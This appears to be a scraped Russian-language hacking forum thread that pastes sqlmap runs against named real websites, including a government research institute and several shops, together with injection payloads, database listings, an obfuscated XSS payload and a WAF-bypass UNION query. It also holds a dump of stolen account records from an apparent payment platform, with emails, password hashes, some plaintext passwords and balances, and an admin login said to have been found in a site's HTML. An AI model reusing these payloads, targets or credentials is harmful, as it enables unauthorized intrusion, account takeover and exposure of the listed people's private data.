sqlmap -u "https://cish.icar.gov.in/event_page.php?a=1" --dbs --random-agent
available databases [2]:
[*] cish
[*] information_schema
sqlmap -u "https://cish.icar.gov.in/event_page.php?a=1" --dump -D cish --tables --random-agent
Database: cish
[31 tables]
+-----------------+
| user |
| agro |
| annual_report |
| circulars |
| committee |
| enterpreneur |
| event |
| feedback |
| hits |
| info |
| library |
| login_activity |
| mango_news |
| newsletter |
| nursery |
| nursery_old |
| photo_gallery |
| php_users_login |
| plant_req |
| plant_req__old |
| plant_request |
| recent |
| staff |
| staffproen |
| technology |
| udyaan_rashmi |
| upcoming_event |
| useful_link |
| users |
| variety |
| weather |
+-----------------+
sqlmap -u "https://ijaer.in/more2.php?id=167" --dbs
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 441 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=167' AND 7989=7989 AND 'ZbrD'='ZbrD
---
available databases [1]:
[*] ijetsg1l_shriganesh
так же сильно проще http_s://ijaer.in/more2.php?id=-167%27%0B/*!12345UnIOn*/%0B/*!12345SEleCt*/%0B1,2,3,version(),user(),6,7,database(),9,10,11,12,13,14,15--%20%27Код:sqlmap -u "https://ijaer.in/more2.php?id=167" --dbs GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 441 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=167' AND 7989=7989 AND 'ZbrD'='ZbrD --- available databases [1]: [*] ijetsg1l_shriganesh
dev0/dev0/b171eb45139e9ee6180c5b9552240b34/0.00/0.00/Undefined
dev1/dev1/44335d0e8be412a9c5750229a1212899/0.00/0.00/Admin1
dev2/dev2/1eef5434df642b44871f210ac8199c8e/0.00/0.00/Admin2
dev3/dev3/3d28bbcc5a4e14f60309ccaa6e8368a9/0.00/0.00/Admin3
dev4/dev4/fbd6cc25aa7bcf1921e3b73c6d86d05c/0.00/0.00/Admin4
sup1/sup1/18ad12129adb51c9f73583cb388b8714/0.00/0.00/BusyOwl
sup2/sup2/20e509878e8552ee0995e586b37961a2/0.00/0.00/ReactiveColibri
sup4/sup4/2267d39093a5c36e0f13f6cc833705f3/0.00/0.00/Pterodactyl
sup5/sup5/a49803806dd790d9e25c73413226a0f6/0.00/0.00/Nightjar
sup6/sup6/a3cbffb276a45cfb09f67896b4a765b4/0.00/0.00/Hawk
raven@bbpay.co/raven/860842de61878276ff878664c5e4639e/0.00/0.00/Raven
phoenix@bbpay.co/phoenix/64d98daf19508b4bbb0a9fbbe0be98fa/0.00/0.00/Phoenix
goldeneagle@bbpay.co/goldeneagle/8fad3407ebdc11490abf8a64c90e366f/0.00/0.00/GoldenEagle
jaybird@bbpay.co/jaybird/5116faa11c034c705875ea9204fbe6aa/0.00/0.00/Jaybird
/weasel/98ea8cbf633fd29de465c8de8219ca63/0.00/0.00/Weasel
support@azino777.com/azadmin/c8fecc5a2f303c51dd2378df905313aa/0.00/1490.00/BlaBlaPay Test
salesgamer@yandex.ru/salesgamer/9c5ba40c4232ce14d661f0387db2c16a/0.00/0.00/Sales Game
su@adgroup.marketing/ADGroup/6d74e3027b5203cad930f7f5d75ee001/5320776.13/0.00/ECOM
su@adgroup.marketing/ADGroupUZ/6d74e3027b5203cad930f7f5d75ee001/0.00/0.00/ECOM UZ
Milen.m@paytiko.com/Paytiko/c28c45e153c7ea2010a7e529a0b474cb/0.00/0.00/PAYTIKO
ovsepik@gmail.com/ovsepik/c48b23616445ddfd653dca2a3a1870bf/2885.00/0.00/1RUBET
barnistinson@bukvaved.club /bukvaved.club/9c1bbe63d3d6d9bed90d949984553621/0.20/0.00/bukvaved.club
anton@koleso.group/anton@koleso.group/506c65e656af034ed2ecae4affd50334/0.00/0.00/Koleso Group
xcd@protonmail.com/pirateshop/12723135e035d33eb11dde1a1f1569e8/6174.00/0.00/www.openssource.cc
volkslot@gmail.com/volkslot@gmail.com/888a7d0185e2e3c2afc1c5ebe04db748/9212.29/0.00/Payment Solution
cathiel@trifandvid.com/cathiel@trifandvid.com/013df7e4b6efc8b37cd4581989600c41/4.43/0.00/Casino or sports betting
totalpay.me@gmail.com/totalpay.me@gmail.com/b91f6ca009cfa94915e1e07b99ba3c82/4630.34/0.00/Payments TopUp
partners@vegas-grand.info/partners@vegas-grand.info/9549929764291090fb0b9234b4035154/0.00/0.00/Vegas Grand Casino
ataman@gamesys.eu/verlos/fc39801da5a12359f9c6239eeb7693d1/10.27/0.00/Verlos
Support@b2pay.io/Support@b2pay.io/1e36fb6b30015740574b8be9a6a63eda/0.00/0.00/Payments
webmaster@amirox.company/webmaster@amirox.company/2d9429bbd22a5884f6618e1a091bc871/0.00/0.00/AMIROX IC
Ka_brus@bet-boom.com /Ka_brus@bet-boom.com/31e68885515a99fab29fe9c7517df401/0.00/0.00/Multi Hub
Partner@gecktohub.com/Partner@gecktohub.com/ca38b660de035e3f015afc4d3ea525dc/0.00/0.00/Lion Casino
sale@cool-air.org/sale@cool-air.org/535dbf5a8ef1f89166444f89cacf68bd/0.00/0.00/Casino Payments
alexvishno58@gmail.com/alexvishno58@gmail.com/d12e935b9a08d144259f0b16c2c05f91/128926.94/0.00/UP-X Games
chugunov87@gmail.com/chugunov87@gmail.com/12723135e035d33eb11dde1a1f1569e8/0.00/0.00/Alex Test
billing@mostbet.com/billing@mostbet.com/30a7fd60185dd3c82ee05efa1e954ff4/518980.69/0.00/mostbet.com
support@bithash.net/bithash/2b2e2ca1b179a0ff62ff5bf85d82ee87/0.00/0.00/BitHash
t33@mxmail.mx/t33/7adae009762afd6d89c0a87b691bb558/0.00/0.00/T33
t33@mxmail.mx/t33sup/7adae009762afd6d89c0a87b691bb558/0.00/0.00/T33
t35@mxmail.mx/t35/f9952a2f0c8153301e0d7b18fb39db22/0.00/0.00/T35
t35@mxmail.mx/t35sup/f9952a2f0c8153301e0d7b18fb39db22/0.00/0.00/T35
t5@mxmail.mx/t5/Parol010/0.00/0.00/T5
t5@mxmail.mx/t5sup/Parol010/0.00/0.00/T5
t36@mxmail.mx/t36/strong/0.00/0.00/T36
t36@mxmail.mx/t36sup/c1e548c3751ce406d8ade26dcee5c89c/0.00/0.00/T36
t21@mxmail.mx/t21/strong/0.00/0.00/Т21
t15@mxmail.mx/t15/strong/0.00/0.00/Т15
t33@mxmail.mx/t33sup1/e2b11ea3d458b7c08af61dbffb526838/0.00/0.00/T33
t33@mxmail.mx/t33sup2/7kCWjK/0.00/0.00/Т33
t37@mxmail.mx/t37/9404120ef6648091fa1cee76bfca2eab/0.00/0.00/Т37
t24@mxmail.mx/pt24/a9502092a5136bfc11c39b7da9e185ca/0.00/0.00/Т24
t2@mxmail.mx/t2/f9952a2f0c8153301e0d7b18fb39db22/0.00/0.00/Т2
t34@mxmail.mx/t34/f9952a2f0c8153301e0d7b18fb39db22/0.00/0.00/Т34
t38@mxmail.mx/t38/f9952a2f0c8153301e0d7b18fb39db22/0.00/0.00/Т38
t14@mxmail.mx/t14/f9952a2f0c8153301e0d7b18fb39db22/0.00/0.00/Т14
t34@mxmail.mx/t34sup/f9952a2f0c8153301e0d7b18fb39db22/0.00/0.00/Т34
t37@mxmail.mx/t37sup/a5e415958fc41b06e7e7056c43666414/0.00/0.00/Т37
/!PinUp1@/3123a0f2c74a9d1a676326f523cbf045/0.00/0.00/PinUp
jokercasino999@proton.me/joker_cazino/9a2c372b9262141eb55704a5b5fd5eb2/0.00/0.00/Joker Cazino
goodboycasino@proton.me/goodboy/52bdcecbd544442fcfa302c2b8c96b71/0.00/0.00/Goodboy Casino
luxorcasino999@proton.me/luxorcasino/c2e717f53dd1e41e0c70416a2ed1da1e/0.00/0.00/Luxor Casino
Yurazzzz@gmail.com/os_market/f212ade3dc776c4f6daf6b412bf4638a/0.00/0.00/OS market
info@biggame.solutions/bgs/4cb3bed04c506b31351b3e4f44b5983f/0.00/0.00/Biggame solutions
su@adgroup.marketing/ADGroupP2P/20bfc31a02555d2c82e8d4dcbff411de/1712.50/0.00/Ecom P2P
kb@multihub.global/multihub/415da2fefdddde79dd33504e65132fc3/0.00/0.00/MultiHub
team@fontan-casino.com/fontan/190b70d08695962021eb6a8f21c54d8e/0.00/0.00/fontan-casino
newhost@acem.pw/slava-klub/04aab9313cf51c045be68f752f0d5e62/0.00/0.00/Slava-Klub
/t33test/34550f2e6fa735c4bdab5d4f486865f3/0.00/0.00/t33test
payments@binany.com/payments@binany.com/8f5cb29134a96dc7674c136440f3f7c1/0.00/0.00/binany.com
/uzstest/f2aacbea41de0e1d231ec459f73ad1b5/0.00/0.00/uzstest
glk@inwizo.com/inwizo/7a6b948d6c873b95b0d40c9bff98d9e1/0.00/0.00/inwizo.com
partner@gecktohub.com/lion-casino/63bcc1b31c5b67bdea8a7f00a31fe605/0.00/0.00/lion-casino
https://www.royal-auction.com//royal-auction/90b7d981ee7df907ade748af623e8d75/0.00/0.00/royal-auction
all.steroid.dev@gmail.com/allsteroid/4b92aba2083089c075de269692f1bf12/4647.96/0.00/brutal market
hellcat2412@gmail.com/Paylama/3c5b0a796d2ebb4f6255ab98aa164741/0.00/0.00/paylama
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
спасибо огромное!так же сильно проще http_s://ijaer.in/more2.php?id=-167%27%0B/*!12345UnIOn*/%0B/*!12345SEleCt*/%0B1,2,3,version(),user(),6,7,database(),9,10,11,12,13,14,15--%20%27
поменяли пароль типа и проблем нет. Ахахах.оставлены креды прямо в HTMLКод:https://addtrc20.net/
как я понял пилится какая то админка и она пока не рабочая
admin
mhNnOK
sqlmap --tor --tor-type=SOCKS5 -u "www.osmo.com.tr/urun.php?id=12" --dbs --random-agent
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=12 AND 6670=6670
------------------------------------------------------------------------------------------------------------------------------
python sqlmap.py --url="http://www.weber-schlitten.de/produkt.php?id=17&mode=2"
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=17 AND 8210=8210&mode=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=17 AND (SELECT 1161 FROM (SELECT(SLEEP(5)))qJEG)&mode=2
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-1007 UNION ALL SELECT NULL,NULL,CONCAT(0x716a6a7871,0x685751725059495a6b497475794659636e66724e74696963544a6d646a684f5458534e65486b4a65,0x7170626a71),NULL,NULL,NULL-- -&mode=2
------------------------------------------------------------------------------------------------------------------------------
python sqlmap.py --url="taste.anuga.de/neuheitendatenbank/produkt.php?id=1055&lng=de" --flush-session --technique=BEUS
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1055 AND 7964=7964&lng=de
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1055 AND (SELECT 6444 FROM (SELECT(SLEEP(5)))QjyR)&lng=de
Type: UNION query
Title: Generic UNION query (NULL) - 81 columns
Payload: id=-5010 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b786a71,0x57584e497662436648666c624b55486776687045724750735959515a666d5275454257734568784a,0x7162717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&lng=de
sqlmap -u www.inberg.rs/grupa-proizvoda.php?jezik=en
the back-end DBMS is MySQL
Parameter: jezik (GET)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: jezik=-5451 OR MAKE_SET(5769=5769,2267)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: jezik=en AND (SELECT 6311 FROM (SELECT(SLEEP(5)))MOdN)